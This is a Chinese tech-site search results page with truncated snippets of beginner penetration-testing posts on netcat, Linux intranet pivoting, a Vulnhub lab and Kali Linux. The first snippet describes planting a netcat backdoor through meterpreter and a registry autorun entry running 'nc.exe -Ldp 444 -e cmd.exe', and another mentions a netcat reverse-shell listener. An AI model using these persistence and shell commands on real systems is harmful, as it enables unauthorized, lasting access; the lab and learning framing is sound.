首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

初学内网渗透NC后门植入

前提 就是你已经获取到该服务器的权限了,打算进行持久化攻击维持权限,所以需要上传后门,这里就学习一下nc后门的使用。[aru_28],刚刚看了两天视频,记录一下。...kali:192.168.137.138 靶机:192.168.137.129(已经获取权限了) 实战演练 1.进入meterpreter命令下上传nc后门到靶机 nc工具下载(我也是百度下载的,有没有毒我不知道哈...[aru_33]):https://www.lanzous.com/i7u593e 使用命令:upload nc.exe c:\\windows\\system32 2.修改注册表,把nc添加到开机自启...-d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'             (把nc添加进去,以及连接的端口,连接cmd.exe) reg queryval...验证 1.靶机重启后,在靶机上查看进程 (可以看到靶机上自动启动了nc,打开了444端口) 2.然后我们可以在kali上直接用nc命令去连接靶机 kali上: Windows上:

74710
您找到你想要的搜索结果了吗?
是的
没有找到

Linux内网渗透

渗透工具 能够成功地通过web漏洞获取到webshell,对于一次完整的渗透测试来说,仅仅相当于万里长征的第一步。并不是所有渗透测试都会遇到几百台机器的大内网。...Linux内网渗透 收集测试网络环境 当我们拿到一台目标内网服务器,或者说肉鸡服务器,首先要做的就是收集信息。而在我看来需要收集的信息中,最重要的之一便是肉鸡的网络环境。...查看系统内核 linux系统上查看内核版本如下: lsb_release –a 一般系统的入侵途径是先提权,而提权可以通过linux内核漏洞进行,因此可以先查看linux内核版本,然后根据内核寻找exp...我们可以想到在windows中,利用lcx转发3389端口,linux下同样可以转发22端口,当然更好用的是转发80端口,达到可以本地访问内网的web服务,从而继续web渗透的套路,扩大攻击面。...linux内网安全建议 说了这么多内网渗透的套路,按惯例最后该给出内网安全建设的几点建议了,当然只是个人看法。

6.6K40

windows nc

nc就是netcat,官网:https://eternallybored.org/misc/netcat/windows nc命令用法跟linux基本一样,常用的就这4个组合nc -l -u -p Port...Windows命令之一image.pngimage.pngtelnet只能测试tcp端口nmap既能测tcp端口,也能测udp端口nc命令注意事项总结: ①监听命令windows和linux通用,例如nc...-l -u -p8888、nc -l -t -p33899②windows上,-nvu、-nvt跟linux上的表现一致,-nvu都需要回车后敲字符来验证③-z误导人,不要使用-z参数windows、...linux上常用的nc命令举例:【监听UDP端口】监听udp协议8888端口nc -l -u -p8888windows 101.34.180.125、linux 115.159.148.149都监听了...a、b、c、d,如果是监听的,不会断开,直到Ctrl+C,并且对端也收到了a、b、c、d;如果不是监听的,马上就会断开linux做客户端nc -nvu 101.34.180.125 8888nc -nvu

7.8K30

三十.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(3)

---- 一.bulldog题目描述及环境配置 Vulnhub是一个特别好的渗透测试实战靶场,提供了许多带有漏洞的渗透测试虚拟机下载。...作者会深入分析20多个案例来熟悉各种Web渗透工具及方法,希望能帮助到您。...进入高级选项,再次选择第二个Linux内核版本的恢复模式回车。 回车后会弹出选择界面,我们选择root一行回车,接着再次回车进入命令行模式。...第二步,使用Linux的 & 和 | 进行命令组合绕过 ifconfig&&ls ifconfig & whoami 我们需要想办法绕过防火墙取得最终权限,经过一番琢磨,用echo命令打包可以实现绕过...第三步,nc监听端口并反弹shell 本地执行nc -lvp 4444监听本地端口4444,然后在Web-shell上执行反弹脚本。

83020

Kali Linux渗透测试技术详解_渗透测试入门

Kali Linux是做渗透测试用的 2. 安装VMware Workstation虚拟机 3. 安装kali-linux系统 4....Kali Linux是做渗透测试用的 渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。...不论测试方法是否相同,渗透测试通常具有两个显著特点: 渗透测试是一个渐进的且逐步深入的过程。 渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。...渗透测试所需的工具可以在各种Linux操作系统中找到,需要手动安装这些工具。由于工具种类繁杂,安装这些工具会变成一个浩大的工程。...为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中最典型的就是Kali Linux。 该系统主要用于渗透测试。

4.4K20
领券